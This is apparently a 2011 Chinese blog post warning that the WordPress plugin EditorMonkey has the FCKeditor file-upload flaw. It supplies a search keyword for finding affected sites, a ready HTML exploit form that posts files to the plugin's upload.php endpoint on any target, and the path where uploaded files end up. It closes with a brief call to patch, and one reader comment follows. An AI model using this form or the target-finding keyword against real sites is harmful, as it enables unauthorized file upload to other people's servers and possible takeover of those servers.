WordPress插件EditorMonkey存在上传BUG。
用Windows 2003系统的博友请注意了。
这BUG也就是Fckeditor的上传BUG。所以WP博友还是用自带的编辑器安全一点。
BUG关键字:plugins/editormonkey
EXP:
1 2 3 4 5 | <form id="frmUpload" enctype="multipart/form-data" action=http://BUG网站/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method="post"> Upload a new file:<br> <input type="file" name="NewFile" size="50"><br> <input id="btnUpload" type="submit" value="Upload"> </form> |
BUG上传后文件在:/UserFiles/tmdsb.txt
这个插件的博客很多,请赶快修复吧。
文章地址:http://blog.nodll.com/2011/05/15/wordpress-editormonkey-bug/Pray.html
星期一, 五月 16, 2011 at 16:10
我好像 没用到这个插件